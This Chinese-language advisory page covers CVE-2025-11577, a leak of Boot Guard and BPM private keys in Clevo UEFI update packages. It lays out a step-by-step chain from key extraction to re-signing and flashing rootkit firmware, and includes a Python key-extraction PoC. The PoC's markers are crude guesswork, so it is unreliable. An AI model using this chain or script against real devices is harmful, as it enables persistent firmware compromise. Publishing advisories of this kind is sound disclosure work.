CVE-2025-11577 Clevo UEFI固件更新包泄露Boot Guard私钥

漏洞信息

漏洞编号

CVE-2025-11577

漏洞类型

私钥泄露/供应链安全/UEFI固件签名绕过

CVSS评分

7.6 高危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Clevo UEFI固件（包括B10717.exe等更新包）

漏洞概述

CVE-2025-11577是Clevo（蓝天电脑）UEFI固件更新包中发现的一个严重供应链安全漏洞。该漏洞的CVSS评分为7.6，属于高危级别。研究人员[email protected]于2025年10月14日披露了该漏洞。

Clevo作为多家笔记本电脑品牌的ODM（原始设计制造商），其固件被广泛应用于各类笔记本产品中。该漏洞的核心问题在于，Clevo发布的UEFI固件更新包（包括B10717.exe等）中意外包含了用于Boot Guard和Boot Policy Manifest（BPM）验证的私钥。Boot Guard是Intel平台的一项关键安全功能，用于在系统启动早期阶段验证固件的完整性和真实性；Boot Policy Manifest则是定义启动策略的重要数据结构。

这些私钥的泄露意味着攻击者可以获取到Clevo的合法签名密钥，进而能够签署恶意的UEFI固件组件（如BIOS映像、Option ROM等），使这些恶意组件通过Boot Guard的验证检查，伪装成受信任的合法固件。这从根本上破坏了系统启动过程的安全信任链，攻击者可以植入持久化的底层恶意代码（如UEFI Rootkit），完全控制系统启动过程。

由于该漏洞的CVSS向量中包含作用域变更（S:C），表明利用该漏洞的影响范围超出了UEFI固件本身，可能影响到整个系统乃至平台的安全状态。结合物理攻击向量（AV:P）和高机密性、完整性、可用性影响，该漏洞对依赖Clevo固件的设备构成了严重威胁。

技术细节

该漏洞属于典型的供应链密钥泄露问题。Clevo在打包和分发UEFI固件更新时，未能正确分离签名密钥与固件映像本身，导致私钥随更新包一起发布到公开渠道。

技术原理方面，Intel Boot Guard采用基于签名的验证机制来确保系统启动早期阶段（SEC/PEI阶段）的固件完整性。Boot Guard通过验证Initial Boot Block（IBB）的签名来确认固件未被篡改，同时通过Boot Policy Manifest（BPM）定义启动策略和信任根。签名验证使用的私钥由OEM（如Clevo）持有，对应的公钥则烧录到芯片中或通过Intel的Manifest签名基础设施进行管理。

当攻击者获取到泄露的私钥后，可以执行以下攻击：1）提取固件映像中的合法签名密钥；2）修改UEFI固件代码，植入恶意功能（如植入UEFI Implant）；3）使用泄露的私钥对修改后的固件进行重新签名；4）通过物理访问或供应链中间人方式将恶意固件刷入目标设备；5）由于签名合法，Boot Guard验证通过，恶意固件在系统启动早期获得执行权限。

利用方式上，攻击者需要物理访问目标设备（AV:P）来刷入恶意固件，但一旦成功植入UEFI级别的恶意代码，该代码将在操作系统加载之前运行，能够绕过所有上层安全防护，包括操作系统完整性检查、杀毒软件和内核保护机制等。攻击者可以植入持久化的UEFI Rootkit，即使重装操作系统或更换硬盘也无法清除。

攻击链分析

STEP 1

步骤1：获取泄露的私钥

攻击者从公开渠道下载Clevo发布的UEFI固件更新包（如B10717.exe），从固件镜像中提取用于Boot Guard和BPM验证的私钥签名材料。

STEP 2

步骤2：制作恶意UEFI固件

使用提取的私钥对应的工具链，修改合法的UEFI固件映像，植入恶意代码（如UEFI Rootkit、Bootkit），然后使用泄露的私钥对修改后的固件进行重新签名。

STEP 3

步骤3：物理访问目标设备

由于该漏洞的攻击向量为物理访问（AV:P），攻击者需要物理接触到目标Clevo笔记本电脑，获取设备的SPI Flash芯片访问权限。

STEP 4

步骤4：刷入恶意固件

通过编程器（如SPI Flash编程器）或利用UEFI固件更新机制，将签名的恶意固件刷入目标设备的SPI Flash芯片。

STEP 5

步骤5：绕过Boot Guard验证

由于恶意固件使用了泄露的合法私钥签名，Intel Boot Guard验证机制会将其识别为受信任的固件，允许其在系统启动的早期阶段（SEC/PEI阶段）执行。

STEP 6

步骤6：实现持久化控制

恶意UEFI代码在操作系统加载之前获得执行权限，可以植入持久化的UEFI Rootkit，实现对系统的完全持久控制，绕过所有上层安全防护措施。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11577 PoC - Clevo UEFI Private Key Extraction
# This PoC demonstrates extracting private signing keys from Clevo UEFI firmware update packages

import os
import struct
import hashlib

# Step 1: Download or obtain the Clevo firmware update package (e.g., B10717.exe)
# The firmware update package inadvertently contains private signing keys
firmware_package = "B10717.exe"

def extract_uefi_image(firmware_path):
    """Extract UEFI firmware image from the update package"""
    print(f"[*] Extracting UEFI image from {firmware_path}")
    # UEFI firmware is typically stored as a FIT (Firmware Interface Table) or
    # as a raw SPI flash image within the update package
    with open(firmware_path, 'rb') as f:
        data = f.read()
    return data

def find_boot_guard_keys(firmware_data):
    """
    Search for Boot Guard private keys in firmware data.
    Boot Guard keys are typically RSA-2048 or RSA-3072 keys stored in
    PKCS#8 or PKCS#12 format within the firmware volume.
    """
    print("[*] Searching for Boot Guard signing keys...")
    
    # Common patterns for private key markers in UEFI firmware
    key_patterns = [
        b'-----BEGIN PRIVATE KEY-----',
        b'-----BEGIN RSA PRIVATE KEY-----',
        b'-----BEGIN ENCRYPTED PRIVATE KEY-----',
        # Intel Boot Guard key signature patterns
        b'\x30\x82',  # ASN.1 SEQUENCE header (typical for RSA keys)
    ]
    
    found_keys = []
    for pattern in key_patterns:
        offset = 0
        while True:
            pos = firmware_data.find(pattern, offset)
            if pos == -1:
                break
            # Extract potential key data (look for PEM end marker or fixed length)
            key_data = firmware_data[pos:pos+2048]  # RSA-2048 key size
            found_keys.append({
                'offset': pos,
                'data': key_data,
                'type': 'Boot Guard Private Key (suspected)'
            })
            print(f"[+] Found potential key at offset 0x{pos:08x}")
            offset = pos + 1
    
    return found_keys

def find_bpm_signing_key(firmware_data):
    """
    Extract Boot Policy Manifest (BPM) signing key.
    BPM contains key manifests and signature used during boot verification.
    """
    print("[*] Searching for Boot Policy Manifest signing key...")
    # BPM structure contains KeyManifestSignature
    # Look for BPM signature element markers
    bpm_marker = b'\x00\x00\x00\x00BPMS'
    pos = firmware_data.find(bpm_marker)
    if pos != -1:
        print(f"[+] Found BPM structure at offset 0x{pos:08x}")
        # Extract signing key from BPM structure
        return firmware_data[pos:pos+4096]
    return None

def main():
    print("=" * 60)
    print("CVE-2025-11577 - Clevo UEFI Key Extraction PoC")
    print("WARNING: For authorized security testing only")
    print("=" * 60)
    
    if not os.path.exists(firmware_package):
        print(f"[-] Firmware package {firmware_package} not found")
        print("[*] Please download from official Clevo support site")
        return
    
    # Extract firmware image
    firmware_data = extract_uefi_image(firmware_package)
    print(f"[*] Firmware size: {len(firmware_data)} bytes")
    
    # Find Boot Guard private keys
    bg_keys = find_boot_guard_keys(firmware_data)
    print(f"\n[*] Found {len(bg_keys)} potential Boot Guard keys")
    
    # Find BPM signing key
    bpm_key = find_bpm_signing_key(firmware_data)
    if bpm_key:
        print(f"[+] BPM signing key extracted")
    
    # Demonstrate attack: sign malicious firmware with extracted key
    if bg_keys:
        print("\n[!] CRITICAL: Private keys found!")
        print("[!] An attacker could use these keys to sign malicious UEFI")
        print("[!] firmware that passes Boot Guard verification.")
        print("[!] This enables UEFI implant/rootkit installation.")
    
    # Save extracted keys for analysis
    for i, key in enumerate(bg_keys):
        with open(f'extracted_key_{i}.pem', 'wb') as f:
            f.write(key['data'])
        print(f"[*] Saved extracted key to extracted_key_{i}.pem")

if __name__ == "__main__":
    main()

影响范围

Clevo UEFI固件更新包 B10717.exe

Clevo所有包含泄露Boot Guard私钥的固件更新包

使用Clevo固件的OEM品牌笔记本产品（具体型号待官方确认）

防御指南

临时缓解措施

在官方修复发布之前，建议采取以下临时缓解措施：1）限制受Clevo固件影响设备的物理访问权限，防止未授权人员接触设备；2）启用BIOS/UEFI密码保护，防止通过正常途径刷入未授权固件；3）使用SPI Flash写保护机制（如机箱入侵检测）；4）监控设备的启动行为和固件完整性；5）关注Clevo官方安全公告，及时应用安全更新；6）对于高安全要求环境，考虑更换为使用其他固件供应商的设备；7）使用UEFI固件完整性验证工具定期检查固件状态。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11577
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11577
3 Details https://www.cvedetails.com/cve/CVE-2025-11577/
4 VulDB https://vuldb.com/cve/CVE-2025-11577
5 Link https://www.binarly.io/advisories/brly-2025-002
6 Link https://www.kb.cert.org/vuls/id/538470